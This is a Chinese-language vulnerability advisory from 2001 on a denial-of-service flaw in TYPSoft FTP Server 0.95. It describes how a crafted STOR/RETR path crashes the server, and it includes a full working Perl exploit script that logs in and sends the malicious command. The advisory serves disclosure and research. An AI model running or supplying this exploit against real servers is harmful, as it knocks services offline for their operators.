TYPSoft FTP Server STOR/RETR 拒绝服务漏洞
发布日期:2001-10-04
更新日期:2001-10-11
受影响系统:
TYPSoft TYPSoft FTP Server 0.95
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows 2000
- Microsoft Windows NT 4.0
描述:
BUGTRAQ ID: 3409
CVE(CAN) ID:
CAN-2001-1156
发现TYPSoft FTP Server v0.95存在拒绝服务漏洞,通过提交精心构造的“STOR”或
“RETR”命令就会消耗99%的CPU时间,并且TYPSoft FTP Server崩溃,只有重新启动才
能恢复正常功能。
<*来源:J. Wagner (
jan.wagner@de.tiscali.com)
参考:
http://archives.neohapsis.com/archives/bugtraq/2001-10/0050.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
J. Wagner (
jan.wagner@de.tiscali.com)提供了如下测试代码:
<typ095DOS.pl>
#!/usr/bin/perl
use IO::Socket;
use Socket;
print "-= ASGUARD LABS EXPLOIT - TYPSoft FTP Server v0.95 =-\n\n";
if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typ095DOS.pl <host> <user>
<pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };
$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err = "RETR ../../*";
#Both works "STOR" and "RETR"
$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: can't connect to $adr:$prt\n";
$remote->autoflush(1);
print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: can't send user\n";
print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: can't send pass\n";
print $remote "$err/\n" and print "3. Sending : ErrorCode...\n\n"or die
"Error: can't send error code\n";
print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote;
建议:
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.multimania.com/typsoft/
浏览次数:4235
严重程度:0(网友投票)